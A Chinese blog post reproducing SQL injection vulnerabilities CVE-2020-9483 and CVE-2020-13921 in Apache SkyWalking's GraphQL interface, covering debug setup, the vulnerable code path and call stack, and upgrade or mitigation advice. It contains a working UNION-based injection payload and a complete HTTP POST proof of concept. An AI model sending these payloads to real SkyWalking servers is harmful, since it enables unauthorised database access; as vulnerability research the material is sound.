[CVE-2020-9483/13921]Apache SkyWalking SQL注入

最新推荐文章于 2023-10-13 15:02:19 发布
最新推荐文章于 2023-10-13 15:02:19 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: java Web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/107857173
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

参考:

  • https://www.openwall.com/lists/oss-security/2020/06/15/1
  • https://mp.weixin.qq.com/s/91MWSDYkom2Z8EVYSY37Qw
  • http://www.h2database.com/html/functions.html#h2version
  • https://s.tencent.com/research/bsafe/1011.html
  • https://blog.csdn.net/smooth00/article/details/96479544

编译好的6.5.0版本:

wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz
wget https://archive.apache.org/dist/skywalking/8.3.0/apache-skywalking-apm-8.3.0.tar.gz
cd apache-skywalking-apm-bin/bin
vi oapService.sh

相关源码:
https://archive.apache.org/dist/skywalking/8.3.0/apache-skywalking-apm-8.3.0-src.tgz
源码编译方式参考:
https://github.com/apache/skywalking/blob/master/docs/en/guides/How-to-build.md

加上调试参数:

DEBUG_OPTIONS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=12346"

然后启动:

./startup.sh

在这里插入图片描述
可以看出来是分两部分启动的,OAP和Web Application。
发现已经在监听12346端口了。

下载6.5.0源码 (https://www.apache.org/dyn/closer.cgi/skywalking/6.5.0/apache-skywalking -apm-6.5.0-src.tgz)

导入IDEA,添加Remote Configuration,并设置module classpath为oap-server。

漏洞描述:

When use H2/MySQL/TiDB as Apache SkyWalking storage, the
metadata query through GraphQL protocol, there is a SQL injection
vulnerability,
which allows to access unpexcted data. Apache SkyWalking
6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don’t use the
appropriate way to set SQL parameters.

影响版本:
6.0.0-6.6.0, 7.0.0

我改成tcp形式才成功,默认的h2是内存型的,没找到表,导致失败了。 编辑application.yml

在这里插入图片描述

在这里插入图片描述

通过调试可以发现对id参数进行了拼接:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kj4Fajf2-1599014338834)(http://10.255.247.160:8080/image/20200807/1596793459001.jpg)]

于是对id参数构造payload:

id: \"') UNION SELECT 1,CONCAT('~', H2VERSION(), '~')--\"

由于where查询语句已经结束,可以使用union注入,最后使用--注释掉后面的内容。
在这里插入图片描述

Demo:
在这里插入图片描述

调用栈:

executeQuery:106, JDBCHikariCPClient (org.apache.skywalking.oap.server.library.client.jdbc.hikaricp)
getLinearIntValues:117, H2MetricsQueryDAO (org.apache.skywalking.oap.server.storage.plugin.jdbc.h2.dao)
getLinearIntValues:96, MetricQueryService (org.apache.skywalking.oap.server.core.query)
getLinearIntValues:60, MetricQuery (org.apache.skywalking.oap.query.graphql.resolver)
invoke:-1, MetricQueryMethodAccess (org.apache.skywalking.oap.query.graphql.resolver)
get:147, MethodFieldResolverDataFetcher (com.coxautodev.graphql.tools)
fetchField:227, ExecutionStrategy (graphql.execution)
resolveField:170, ExecutionStrategy (graphql.execution)
execute:59, AsyncExecutionStrategy (graphql.execution)
executeOperation:158, Execution (graphql.execution)
execute:100, Execution (graphql.execution)
execute:558, GraphQL (graphql)
parseValidateAndExecute:500, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:87, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:81, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:54, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:101, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:105, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:841, ServletHolder (org.eclipse.jetty.servlet)
doHandle:543, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:188, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1239, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:168, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:481, ServletHandler (org.eclipse.jetty.servlet)
nextScope:166, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1141, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:132, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:564, Server (org.eclipse.jetty.server)
handle:320, HttpChannel (org.eclipse.jetty.server)
onFillable:251, HttpConnection (org.eclipse.jetty.server)
succeeded:279, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:110, FillInterest (org.eclipse.jetty.io)
run:124, ChannelEndPoint$2 (org.eclipse.jetty.io)
runJob:672, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:590, QueuedThreadPool$2 (org.eclipse.jetty.util.thread)
run:748, Thread (java.lang)

poc:

POST /graphql HTTP/1.1
Host: cqq.com:8080
Content-Type: application/json;charset=utf-8
Content-Length: 313
Connection: close

{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \"all_p99\", id: \"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}

修复建议:
升级Apache SkyWalking至8.0版,升级链接:https://github.com/apache/skywalking/releases

如暂时无法升级,作为缓解措施,建议不要将Apache SkyWalking的GraphQL接口暴露在外网,或在GraphQL接口之上增加一层认证。

CVE-2020-13921

Only when using H2/MySQL/TiDB as Apache
SkyWalking storage, there is a SQL injection vulnerability in the wildcard
query cases.

参考:
https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E

去这里找文件接口:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol
在这里插入图片描述

安装了多个版本总碰到这个异常:

logs$ vi webapp.log

具体:

com.netflix.zuul.exception.ZuulException: Forwarding error
    at org.springframework.cloud.netflix.zuul.filters.route.RibbonRoutingFilter.handleException(RibbonRoutingFilter.java:189)
    at org.springframework.cloud.netflix.zuul.filters.route.RibbonRoutingFilter.forward(RibbonRoutingFilter.java:164)
    at org.springframework.cloud.netflix.zuul.filters.route.RibbonRoutingFilter.run(RibbonRoutingFilter.java:111)
    at com.netflix.zuul.ZuulFilter.runFilter(ZuulFilter.java:112)
    at com.netflix.zuul.FilterProcessor.processZuulFilter(FilterProcessor.java:193)
    at com.netflix.zuul.FilterProcessor.runFilters(FilterProcessor.java:157)
    at com.netflix.zuul.FilterProcessor.route(FilterProcessor.java:118)
    at com.netflix.zuul.ZuulRunner.route(ZuulRunner.java:96)
    at com.netflix.zuul.http.ZuulServlet.route(ZuulServlet.java:116)
    at com.netflix.zuul.http.ZuulServlet.service(ZuulServlet.java:81)

解决方法:修改webapp/webapp.yml:(开始ReadTimeout只有10000)

server:
  port: 8080

collector:
  path: /graphql
  ribbon:
    ReadTimeout: 600000
    # Point to all backend's restHost:restPort, split by ,
    listOfServers: 127.0.0.1:12800

参考:

  • https://blog.csdn.net/weixin_39220472/article/details/89431528

GraphQL背景知识

参考:

新添加功能时,将接口声明写在.graphqls文件中,
比如SkyWalking中:
org\apache\skywalking\oap\query\graphql\GraphQLQueryProvider#prepare

.file("query-protocol/log.graphqls")
                                           .resolvers(new LogQuery(getManager()))

h2数据库测试

在mavan里找
直接运行:

java -jar C:\Users\Administrator\.m2\repository\com\h2database\h2\1.4.196\h2-1.4.196.jar

即可自动打开web console界面进行测试。

caiqiiqi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache-Skywalking-SQL注入复现+利用(CVE-2020-9483)
0xSec
03-12 1331
Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
Apache SkyWalking SQL注入(CVE-2020-9483)
jammny
02-01 881
漏洞详情 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 影响版本 Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 漏洞分析 漏洞利用 访问/graphql进行抓包,POST提交如下poc:
安全通告 | Apache SkyWalking SQL注入漏洞安全风险公告(CVE-2020-13921
qcloud_security的博客
08-06 523
近日,腾讯蓝军(force.tencent.com)发现并向Apache SkyWalking官方团队提交SQL注入漏洞(漏洞编号:CVE-2020-13921),目前官方已发布新版本修复该漏洞。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。其官方网站显示,大量的国内互联网、银行、民航等领域的
使用Handler(嵌入Jetty学习二)
z69183787的专栏
11-01 2247
一个Jetty Server可以看成由一下几部分组成,其中Connector负责接收客户端的HTTP请求,请求的处理是由Handler来完成的。在上一个例子中HelloHandler的作用就是处理用户请求,并输出结果。                Handler在Jetty中是一个非常重要的东西,Jetty内部实现了一些Handler,可以分为一下几类:     1.协调Han
java HttpServer for jetty-server-7.0.2 实现简单响应JSON
别忘了微笑
08-22 259
<dependency> <groupId>org.eclipse.jetty</groupId> <artifactId>jetty-server</artifactId> <version>7.0.2.v20100331</version> </dependency> <dependency> <groupId>com.alibaba</gro.
Jetty数据同步使用
debang2014010的专栏
05-07 85
1. Jetty简介   Jetty 是一个开源的servlet容器,它为基于Java的web容器,例如JSP和servlet提供运行环境。Jetty是使用Java语言编写的,它的API以一组JAR包的形式发布。开发人员可以将Jetty容器实例化成一个对象,可以迅速为一些独立运行(stand-alone)的Java应用提供网络和web连接 2. 项目工作中的使用 近期项目...
Jetty扫盲之实践(一)
sunquan291的专栏
10-20 685
Jetty作为项目使用的轻量级web容器,使用广泛。 目前的微服务化也是以该技术为基础。熟悉如Spring-boot技术的同学不要嘲笑,本文只是技术学习而已。   基本实现 作为web服务,可以通过web.xml的进行配置,主要对servlet进行配置(本文不通过配置文件而是通过代码直接加载Servlet) &lt;?xml version="1.0" encoding="ISO-88...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool(又名嵌入 org.glassfish 中的 Xalan)相关的序列化小工具和类型之间的交互。...
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
# CVE-2020-1938 Apache Tomcat 文件包含 影响版本: Tomcat6-9 Exp: ``` python CNVD-2020-10487-Tomcat-Ajp-lfi.py x.x.x.x -p 8009 -f urfile 一. 漏洞概述 2月20日,国家信息安全漏洞共享平台(CNVD)...
CVE-2020-9483 apache skywalking SQL注入漏洞
最新发布
mirocky的博客
10-13 1298
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
Apache SkyWalkingSql注入(cve-2020-9483)
鸣蜩十四的博客
09-27 1447
简介 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。项目于 2015 年创建,并于 2017 年 12 月进入 Apache 孵化器。 Apache SkyWalking 提供了分布式追踪,服务网格(Service Mesh)遥感数据分析,指标聚合和可视化等多种能力。项目覆盖范围,从一个单纯的分布式追踪系统,扩展为一个可观测性分析平台(observability analysis platform)和应用性能监控管理系统。 漏
[Vulfocus解题系列]skywalking SQL注入CVE-2020-9483
00勇士王子的博客
01-12 3739
描述 Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 复现过程 注:本次复现使用在线靶场http://vulfocus.fofa.so 打开环境 加上路径抓包 /graphql 改成post,加上payload,利用报错注入
Apache Skywalking <= 8.3 SQL注入(漏洞分析|snort规则编写)
weixin_68999845的博客
08-21 1125
Apache Skywalking
jetty介绍之handler
朱志辉的博客
09-26 5242
嵌入一个jetty服务一般会有下面几步,创建Server,加载Connectors,加载handlers,加载Servlets等,启动服务start,最后加入服务器join。一个Jetty Server可以看成由一下几部分组成,其中Connector负责接收客户端的HTTP请求,请求的处理是由Handler来完成的。 Handler在Jetty中是一个非常重要的东西,Jetty内部实现了一些Hand
CVE-2020-9483Apache SkyWalking 存在的SQL注入漏洞复现
weixin_43923736的博客
06-02 1796
CVE-2020-9483Apache SkyWalking 存在的SQL注入漏洞复现
Apache Skywalking 8.3.0 SQL注入漏洞
EC_Carrot的博客
07-28 753
漏洞简介 在Apache Skywalking 8.3.0版本及以前的GraphQL接口中,存在一处H2 Database SQL注入漏洞。 漏洞复现 参考了这位大佬的文章:https://www.linuxlz.com/aqld/2028.html 发送如下数据包即可查看数据库版本: POST /graphql HTTP/1.1 Host: localhost:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mo

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值